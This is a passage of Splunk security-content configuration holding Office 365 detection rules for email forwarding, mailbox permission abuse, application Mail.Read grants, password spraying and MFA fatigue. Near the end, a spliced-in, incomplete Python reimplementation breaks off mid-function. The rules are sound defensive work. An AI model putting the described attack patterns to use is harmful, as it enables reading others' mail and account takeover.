Techniques"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This detection is designed to identify instances where email forwarding has been enabled on mailboxes within an Office 365 environment. By monitoring for the specific operation Set-Mailbox within the o365_management_activity logs, this analytic hones in on changes made to mailbox configurations that initiate the forwarding of emails. It specifically looks for the activation of ForwardingAddress or ForwardingSmtpAddress parameters, indicating that emails are being automatically sent to another email address from the user's mailbox. action.notable.param.rule_title = O365 Mailbox Email Forwarding Enabled action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Operation=Set-Mailbox | eval match1=mvfind('Parameters{}.Name', "ForwardingAddress") | eval match2=mvfind('Parameters{}.Name', "ForwardingSmtpAddress") | where match1>= 0 OR match2>= 0 | eval ForwardTo=coalesce(ForwardingAddress, ForwardingSmtpAddress) | search ForwardTo!="" | rename user_id as user | stats count earliest(_time) as firstTime latest(_time) as lastTime values(ForwardTo) as ForwardTo by user ObjectId |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `o365_mailbox_email_forwarding_enabled_filter` [ESCU - O365 Mailbox Folder Read Permission Assigned - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection is tailored to capture instances where read permissions are assigned to mailbox folders within an Office 365 environment, utilizing 
the operations ModifyFolderPermissions and AddFolderPermissions as captured in the o365_management_activity. Unlike other permission modifications, this detection excludes actions related to the Calendar, Contacts, and PersonMetadata objects, focusing on core mailbox folders. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This detection is tailored to capture instances where read permissions are assigned to mailbox folders within an Office 365 environment, utilizing the operations ModifyFolderPermissions and AddFolderPermissions as captured in the o365_management_activity. Unlike other permission modifications, this detection excludes actions related to the Calendar, Contacts, and PersonMetadata objects, focusing on core mailbox folders. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Mailbox folder permissions may be configured for legitimate purposes, filter as needed. 
action.escu.creation_date = 2024-03-29 action.escu.modification_date = 2024-03-29 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Mailbox Folder Read Permission Assigned - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Collection Techniques"] action.risk = 1 action.risk.param._risk_message = A folder was granted read permission by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Mailbox Folder Read Permission Assigned - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This detection is tailored to capture instances where read permissions are assigned to mailbox folders within an Office 365 environment, utilizing the operations ModifyFolderPermissions and AddFolderPermissions as captured in the o365_management_activity. Unlike other permission modifications, this detection excludes actions related to the Calendar, Contacts, and PersonMetadata objects, focusing on core mailbox folders. 
action.notable.param.rule_title = O365 Mailbox Folder Read Permission Assigned action.notable.param.security_domain = audit action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=Exchange (Operation=ModifyFolderPermissions OR Operation=AddFolderPermissions) object!=Calendar object!=Contacts object!=PersonMetadata | eval isReadRole=if(match('Item.ParentFolder.MemberRights', "(ReadAny)"), "true", "false") | search isReadRole="true" | rename UserId as user | stats count earliest(_time) as firstTime latest(_time) as lastTime by Operation, user, object, Item.ParentFolder.MemberUpn, Item.ParentFolder.MemberRights | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_mailbox_folder_read_permission_assigned_filter` [ESCU - O365 Mailbox Folder Read Permission Granted - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection focuses on identifying changes in mailbox folder permissions within an Office 365 environment, specifically pinpointing instances where read permissions are granted. It monitors for two key operations Set-MailboxFolderPermission and Add-MailboxFolderPermission, as logged in the o365_management_activity. These operations are indicative of modifications or additions to the permissions of mailbox folders, potentially altering who can view or interact with the folder contents. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This detection focuses on identifying changes in mailbox folder permissions within an Office 365 environment, specifically pinpointing instances where read permissions are granted. 
It monitors for two key operations Set-MailboxFolderPermission and Add-MailboxFolderPermission, as logged in the o365_management_activity. These operations are indicative of modifications or additions to the permissions of mailbox folders, potentially altering who can view or interact with the folder contents. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Mailbox folder permissions may be configured for legitimate purposes, filter as needed. action.escu.creation_date = 2024-03-28 action.escu.modification_date = 2024-03-28 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Mailbox Folder Read Permission Granted - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Collection Techniques"] action.risk = 1 action.risk.param._risk_message = A folder was granted read permission by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Mailbox Folder Read Permission Granted - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This detection focuses on identifying changes in mailbox folder permissions within an Office 365 
environment, specifically pinpointing instances where read permissions are granted. It monitors for two key operations Set-MailboxFolderPermission and Add-MailboxFolderPermission, as logged in the o365_management_activity. These operations are indicative of modifications or additions to the permissions of mailbox folders, potentially altering who can view or interact with the folder contents. action.notable.param.rule_title = O365 Mailbox Folder Read Permission Granted action.notable.param.security_domain = audit action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=Exchange (Operation="Set-MailboxFolderPermission" OR Operation="Add-MailboxFolderPermission" ) | eval isReadRole=if(match(AccessRights, "^(ReadItems|Author|NonEditingAuthor|Owner|PublishingAuthor|Reviewer)$"), "true", "false") | search isReadRole="true" | rename UserId as user | stats count earliest(_time) as firstTime latest(_time) as lastTime by Operation, user, Identity, AccessRights | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_mailbox_folder_read_permission_granted_filter` [ESCU - O365 Mailbox Inbox Folder Shared with All Users - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies instances where the inbox folder of a mailbox in Office 365 is shared with all users within the tenant. Sharing the inbox folder with all users is an unusual and risky configuration. Attackers have been known to exploit this setting to surreptitiously read a target user's emails from another account. Such unauthorized access can lead to data breaches, leakage of confidential information, or further compromise based on the information gathered from the emails. 
Monitoring for this configuration change ensures that inadvertent or malicious sharing is promptly identified and addressed. If an attacker successfully configures the inbox to be shared with all users, they can access and read all emails in the affected mailbox from any account within the tenant. This can lead to data exfiltration, spear-phishing attacks based on the information in the emails, or further malicious activities using sensitive information gathered from the mailbox. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies instances where the inbox folder of a mailbox in Office 365 is shared with all users within the tenant. Sharing the inbox folder with all users is an unusual and risky configuration. Attackers have been known to exploit this setting to surreptitiously read a target user's emails from another account. Such unauthorized access can lead to data breaches, leakage of confidential information, or further compromise based on the information gathered from the emails. Monitoring for this configuration change ensures that inadvertent or malicious sharing is promptly identified and addressed. If an attacker successfully configures the inbox to be shared with all users, they can access and read all emails in the affected mailbox from any account within the tenant. This can lead to data exfiltration, spear-phishing attacks based on the information in the emails, or further malicious activities using sensitive information gathered from the mailbox. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Administrators might temporarily share a mailbox with all users for legitimate reasons, such as troubleshooting, migrations, or other administrative tasks. 
Some organizations use shared mailboxes for teams or departments where multiple users need access to the same mailbox. Filter as needed. action.escu.creation_date = 2023-09-07 action.escu.modification_date = 2023-09-07 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Mailbox Inbox Folder Shared with All Users - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Collection Techniques"] action.risk = 1 action.risk.param._risk_message = Inbox folder for the $MailboxOwnerUPN$ mailbox was shared with all users. action.risk.param._risk = [{"risk_object_field": "MailboxOwnerUPN", "risk_object_type": "user", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Mailbox Inbox Folder Shared with All Users - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques"], "cis20": ["CIS 10"], "confidence": 70, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies instances where the inbox folder of a mailbox in Office 365 is shared with all users within the tenant. Sharing the inbox folder with all users is an unusual and risky configuration. Attackers have been known to exploit this setting to surreptitiously read a target user's emails from another account. Such unauthorized access can lead to data breaches, leakage of confidential information, or further compromise based on the information gathered from the emails. 
Monitoring for this configuration change ensures that inadvertent or malicious sharing is promptly identified and addressed. If an attacker successfully configures the inbox to be shared with all users, they can access and read all emails in the affected mailbox from any account within the tenant. This can lead to data exfiltration, spear-phishing attacks based on the information in the emails, or further malicious activities using sensitive information gathered from the mailbox. action.notable.param.rule_title = O365 Mailbox Inbox Folder Shared with All Users action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Operation=ModifyFolderPermissions Workload=Exchange object=Inbox Item.ParentFolder.MemberUpn=Everyone | eval isReadRole=if(match('Item.ParentFolder.MemberRights', "(ReadAny)"), "true", "false") | search isReadRole = "true" | stats count earliest(_time) as firstTime latest(_time) as lastTime by Operation, UserId, object, MailboxOwnerUPN, Item.ParentFolder.MemberUpn, Item.ParentFolder.MemberRights | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_mailbox_inbox_folder_shared_with_all_users_filter` [ESCU - O365 Mailbox Read Access Granted to Application - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies instances where the Mail.Read Graph API permissions are granted to an application registration within an Office 365 tenant. It leverages O365 audit logs, specifically events related to changes in application permissions within the AzureActiveDirectory workload. The Mail.Read permission allows applications to access and read all emails within a user's mailbox. 
Emails often contain sensitive or confidential information, and unauthorized access can lead to data breaches or leakage. Monitoring the assignment of this permission ensures that only legitimate applications have such access and that any inadvertent or malicious assignments are promptly identified. If an attacker successfully grants this permission to a malicious or compromised application, they can read all emails in the affected mailboxes. This can lead to data exfiltration, spear-phishing attacks, or further compromise based on the information gathered from the emails. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1114.002", "T1114", "T1098", "T1098.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies instances where the Mail.Read Graph API permissions are granted to an application registration within an Office 365 tenant. It leverages O365 audit logs, specifically events related to changes in application permissions within the AzureActiveDirectory workload. The Mail.Read permission allows applications to access and read all emails within a user's mailbox. Emails often contain sensitive or confidential information, and unauthorized access can lead to data breaches or leakage. Monitoring the assignment of this permission ensures that only legitimate applications have such access and that any inadvertent or malicious assignments are promptly identified. If an attacker successfully grants this permission to a malicious or compromised application, they can read all emails in the affected mailboxes. This can lead to data exfiltration, spear-phishing attacks, or further compromise based on the information gathered from the emails. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. 
action.escu.known_false_positives = There are legitimate scenarios in which an application registration requires mailbox read access. Filter as needed.
action.escu.creation_date = 2023-09-01
action.escu.modification_date = 2023-09-01
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 Mailbox Read Access Granted to Application - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Collection Techniques"]
action.risk = 1
action.risk.param._risk_message = Application registration $object$ was granted mailbox read access by $user$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 45}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 Mailbox Read Access Granted to Application - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques"], "cis20": ["CIS 10"], "confidence": 50, "impact": 90, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1114.002", "T1114", "T1098", "T1098.003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies instances where the Mail.Read Graph API permissions are granted to an application registration within an Office 365 tenant. It leverages O365 audit logs, specifically events related to changes in application permissions within the AzureActiveDirectory workload. The Mail.Read permission allows applications to access and read all emails within a user's mailbox. Emails often contain sensitive or confidential information, and unauthorized access can lead to data breaches or leakage. Monitoring the assignment of this permission ensures that only legitimate applications have such access and that any inadvertent or malicious assignments are promptly identified. If an attacker successfully grants this permission to a malicious or compromised application, they can read all emails in the affected mailboxes. This can lead to data exfiltration, spear-phishing attacks, or further compromise based on the information gathered from the emails.
action.notable.param.rule_title = O365 Mailbox Read Access Granted to Application
action.notable.param.security_domain = access
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `o365_management_activity` Operation="Update application." | eval json_data=mvindex('ModifiedProperties{}.NewValue', 0) | eval json_data=replace(json_data, "^\[\s*", "") | eval json_data=replace(json_data, "\s*\]$", "") | spath input=json_data path=RequiredAppPermissions{}.EntitlementId output=EntitlementIds | eval match_found=mvfind(EntitlementIds, "810c84a8-4a9e-49e6-bf7d-12d183f40d01") | where isnotnull(match_found) | stats max(_time) as lastTime values(EntitlementIds) as EntitlementIds by Operation, user, object | `security_content_ctime(lastTime)` | `o365_mailbox_read_access_granted_to_application_filter`

[ESCU - O365 Multi-Source Failed Authentications Spike - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic detects potential distributed password spraying attacks within an Office 365 environment. It identifies a significant increase in failed authentication attempts characterized by diverse user-and-IP address combinations, originating from multiple source IP addresses, and utilizing various user agents. These patterns may indicate an adversary's attempt to circumvent security controls by employing a spectrum of IP addresses to test commonly used passwords against a wide range of user accounts. The detection examines UserLoginFailed events from O365 Management Activity logs, with a particular focus on events with ErrorNumber 50126, which indicates a failed authentication due to incorrect credentials. By aggregating data over a five-minute interval, the analytic calculates the distinct counts of user-and-IP combinations and unique users and source IPs. It then applies a set of thresholds to these metrics to identify abnormal activities that could suggest a coordinated attack. The predefined thresholds within the analytic (such as unique IPs, unique users, etc.) serve as initial benchmarks and should be tailored to align with the organization's typical user behavior and risk tolerance. Early detection of such distributed activities is crucial for security operations centers (SOCs) to intercept unauthorized access attempts, avert account takeovers, and reduce the risk of subsequent malevolent actions within the organization's systems. A true positive alert from this analytic would indicate an ongoing distributed password spraying campaign targeting the organization's Office 365 tenant. If such an attack is successful, it could lead to unauthorized access, especially to accounts with administrative privileges, resulting in data breaches, privilege escalation, persistent threats, and lateral movement within the organization's digital environment.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This analytic detects potential distributed password spraying attacks within an Office 365 environment. It identifies a significant increase in failed authentication attempts characterized by diverse user-and-IP address combinations, originating from multiple source IP addresses, and utilizing various user agents. These patterns may indicate an adversary's attempt to circumvent security controls by employing a spectrum of IP addresses to test commonly used passwords against a wide range of user accounts. The detection examines UserLoginFailed events from O365 Management Activity logs, with a particular focus on events with ErrorNumber 50126, which indicates a failed authentication due to incorrect credentials. By aggregating data over a five-minute interval, the analytic calculates the distinct counts of user-and-IP combinations and unique users and source IPs. It then applies a set of thresholds to these metrics to identify abnormal activities that could suggest a coordinated attack. The predefined thresholds within the analytic (such as unique IPs, unique users, etc.) serve as initial benchmarks and should be tailored to align with the organization's typical user behavior and risk tolerance. Early detection of such distributed activities is crucial for security operations centers (SOCs) to intercept unauthorized access attempts, avert account takeovers, and reduce the risk of subsequent malevolent actions within the organization's systems. A true positive alert from this analytic would indicate an ongoing distributed password spraying campaign targeting the organization's Office 365 tenant. If such an attack is successful, it could lead to unauthorized access, especially to accounts with administrative privileges, resulting in data breaches, privilege escalation, persistent threats, and lateral movement within the organization's digital environment.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. The thresholds set within the analytic (such as unique IPs, unique users, etc.) are initial guidelines and should be customized based on the organization's user behavior and risk profile. Security teams are encouraged to adjust these thresholds to optimize the balance between detecting genuine threats and minimizing false positives, ensuring the detection is tailored to their specific environment.
action.escu.known_false_positives = This detection may yield false positives in scenarios where legitimate bulk sign-in activities occur, such as during company-wide system updates or when users are accessing resources from varying locations in a short time frame, such as in the case of VPNs or cloud services that rotate IP addresses. Filter as needed.
action.escu.creation_date = 2023-11-09
action.escu.modification_date = 2023-11-09
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 Multi-Source Failed Authentications Spike - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Account Takeover", "NOBELIUM Group"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 Multi-Source Failed Authentications Spike - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `o365_management_activity` Workload=AzureActiveDirectory Operation=UserLoginFailed ErrorNumber=50126 | bucket span=5m _time | eval uniqueIPUserCombo = src_ip . "-" . user | stats dc(uniqueIPUserCombo) as uniqueIpUserCombinations, dc(user) as uniqueUsers, dc(src_ip) as uniqueIPs, values(user) as user, values(src_ip) as ips, values(user_agent) as user_agents by _time | where uniqueIpUserCombinations > 20 AND uniqueUsers > 20 AND uniqueIPs > 20 | `o365_multi_source_failed_authentications_spike_filter`

[ESCU - O365 Multiple AppIDs and UserAgents Authentication Spike - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic is crafted to identify unusual and potentially malicious authentication activity within an O365 environment. It triggers when a single user account is involved in more than 8 authentication attempts, using 3 or more unique application IDs and more than 5 unique user agents within a short timeframe. This pattern is atypical for regular user behavior and may indicate an adversary's attempt to probe the environment, testing for multi-factor authentication requirements across different applications and platforms. The detection is based on analysis of O365 audit logs, specifically focusing on authentication events. It employs statistical thresholds to highlight instances where the volume of authentication attempts and the diversity of application IDs and user agents associated with a single user account exceed normal parameters. Identifying this behavior is crucial as it provides an early indication of potential account compromise. Adversaries, once in possession of user credentials, often conduct reconnaissance to understand the security controls in place, including multi-factor authentication configurations. Tools like Invoke-MFASweep are commonly used for this purpose, automating the process of testing different user agents and application IDs to bypass MFA. By detecting these initial probing attempts, security teams can swiftly respond, potentially stopping an attack in its early stages and preventing further unauthorized access. This proactive stance is vital for maintaining the integrity of the organization's security posture. If validated as a true positive, this detection points to a compromised account, signaling that an attacker is actively attempting to navigate security controls to maintain access and potentially escalate privileges. This could lead to further exploitation, lateral movement within the network, and eventual data exfiltration. Recognizing and responding to this early stage of an attack is vital for preventing substantial harm and safeguarding sensitive organizational data and systems.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This analytic is crafted to identify unusual and potentially malicious authentication activity within an O365 environment. It triggers when a single user account is involved in more than 8 authentication attempts, using 3 or more unique application IDs and more than 5 unique user agents within a short timeframe. This pattern is atypical for regular user behavior and may indicate an adversary's attempt to probe the environment, testing for multi-factor authentication requirements across different applications and platforms. The detection is based on analysis of O365 audit logs, specifically focusing on authentication events. It employs statistical thresholds to highlight instances where the volume of authentication attempts and the diversity of application IDs and user agents associated with a single user account exceed normal parameters. Identifying this behavior is crucial as it provides an early indication of potential account compromise. Adversaries, once in possession of user credentials, often conduct reconnaissance to understand the security controls in place, including multi-factor authentication configurations. Tools like Invoke-MFASweep are commonly used for this purpose, automating the process of testing different user agents and application IDs to bypass MFA. By detecting these initial probing attempts, security teams can swiftly respond, potentially stopping an attack in its early stages and preventing further unauthorized access. This proactive stance is vital for maintaining the integrity of the organization's security posture. If validated as a true positive, this detection points to a compromised account, signaling that an attacker is actively attempting to navigate security controls to maintain access and potentially escalate privileges. This could lead to further exploitation, lateral movement within the network, and eventual data exfiltration. Recognizing and responding to this early stage of an attack is vital for preventing substantial harm and safeguarding sensitive organizational data and systems.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events.
action.escu.known_false_positives = Rapid authentication from the same user using more than 5 different user agents and 3 application IDs is highly unlikely under normal circumstances. However, there are potential scenarios that could lead to false positives.
action.escu.creation_date = 2023-10-24
action.escu.modification_date = 2023-10-24
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 Multiple AppIDs and UserAgents Authentication Spike - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Account Takeover"]
action.risk = 1
action.risk.param._risk_message = $user$ authenticated in a short period of time with more than 5 different user agents across 3 or more unique application ids.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 48}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 Multiple AppIDs and UserAgents Authentication Spike - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover"], "cis20": ["CIS 10"], "confidence": 80, "impact": 60, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `o365_management_activity` Workload=AzureActiveDirectory (Operation=UserLoggedIn OR Operation=UserLoginFailed) | bucket span=5m _time | stats dc(_raw) as failed_attempts dc(ApplicationId) as unique_app_ids dc(UserAgent) as unique_user_agents values(ApplicationId) values(OS) by _time user src_ip | where failed_attempts > 5 and unique_user_agents > 5 and unique_app_ids > 2 | `o365_multiple_appids_and_useragents_authentication_spike_filter`

[ESCU - O365 Multiple Failed MFA Requests For User - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic identifies potential "MFA fatigue" attacks targeting Office 365 users. Specifically, it detects scenarios where a user experiences more than nine Multi-Factor Authentication (MFA) prompts within a 10-minute timeframe. Attackers may exploit MFA fatigue by repeatedly triggering MFA requests, hoping that the user, out of frustration or oversight, will approve a malicious authentication attempt. The detection leverages O365 management activity logs, focusing on Azure Active Directory events. It looks for the UserLoginFailed operation combined with a Success ResultStatus and an ErrorNumber of 500121, which indicates MFA prompts. By monitoring these specific events and conditions, the analytic captures and alerts on potential MFA fatigue scenarios. With MFA being a cornerstone of modern cybersecurity defenses, attackers are constantly seeking ways to bypass or exploit it. MFA fatigue is one such tactic, where attackers rely on user frustration or confusion caused by frequent MFA prompts. Detecting potential MFA fatigue scenarios allows security teams to proactively investigate and ensure that users aren't inadvertently granting access to malicious actors. If this detection flags a true positive, it suggests a potential attempt by an attacker to exploit MFA mechanisms to gain unauthorized access to an O365 account. Successful exploitation could lead to data breaches, unauthorized data access, or further compromise within the O365 environment. Immediate investigation and response would be crucial to safeguard the affected account and assess the full scope of the potential breach.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1621"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This analytic identifies potential "MFA fatigue" attacks targeting Office 365 users. Specifically, it detects scenarios where a user experiences more than nine Multi-Factor Authentication (MFA) prompts within a 10-minute timeframe. Attackers may exploit MFA fatigue by repeatedly triggering MFA requests, hoping that the user, out of frustration or oversight, will approve a malicious authentication attempt. The detection leverages O365 management activity logs, focusing on Azure Active Directory events. It looks for the UserLoginFailed operation combined with a Success ResultStatus and an ErrorNumber of 500121, which indicates MFA prompts. By monitoring these specific events and conditions, the analytic captures and alerts on potential MFA fatigue scenarios. With MFA being a cornerstone of modern cybersecurity defenses, attackers are constantly seeking ways to bypass or exploit it. MFA fatigue is one such tactic, where attackers rely on user frustration or confusion caused by frequent MFA prompts. Detecting potential MFA fatigue scenarios allows security teams to proactively investigate and ensure that users aren't inadvertently granting access to malicious actors. If this detection flags a true positive, it suggests a potential attempt by an attacker to exploit MFA mechanisms to gain unauthorized access to an O365 account. Successful exploitation could lead to data breaches, unauthorized data access, or further compromise within the O365 environment. Immediate investigation and response would be crucial to safeguard the affected account and assess the full scope of the potential breach.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events.
action.escu.known_false_positives = Multiple Failed MFA requests may also be a sign of authentication or application issues. Filter as needed.
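The time-bucketed threshold logic shared by the Multi-Source Failed Authentications Spike and the Multiple Failed MFA Requests detections, as an added example (not Splunk's code) that runs over constructed UserLoginFailed events: 5-minute buckets of ErrorNumber 50126 failures with distinct-count thresholds on user-IP combinations, users and source IPs, and 10-minute buckets per user of ErrorNumber 500121 / ResultStatus Success events. Field names on the constructed events (CreationTime, UserId, ClientIP, UserAgent for the search's _time, user, src_ip, user_agent) are an assumption about the raw audit log; thresholds default to the values used in the searches.

```python
"""Windowed threshold detections over O365 UserLoginFailed audit events:
a distributed password-spraying spike and MFA fatigue (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta, timezone


def to_epoch(creation_time: str) -> int:
    """Parse an ISO-8601 CreationTime; O365 audit timestamps are UTC (assumed when naive)."""
    dt = datetime.fromisoformat(creation_time.replace("Z", "+00:00"))
    if dt.tzinfo is None:
        dt = dt.replace(tzinfo=timezone.utc)
    return int(dt.timestamp())


def bucket_start(epoch: int, span_seconds: int) -> int:
    """Floor a timestamp to its span, the same grouping as SPL `bucket span=Nm _time`."""
    return epoch - (epoch % span_seconds)


def is_login_failed(ev: dict) -> bool:
    return ev.get("Workload") == "AzureActiveDirectory" and ev.get("Operation") == "UserLoginFailed"


def multi_source_failed_auth_spike(events, min_combos=20, min_users=20, min_ips=20):
    """Flag 5-minute buckets of ErrorNumber 50126 (bad credential) failures in which the
    distinct user-IP combinations, users and source IPs all exceed their thresholds."""
    per_bucket = defaultdict(lambda: {"combos": set(), "users": set(), "ips": set(), "agents": set()})
    for ev in events:
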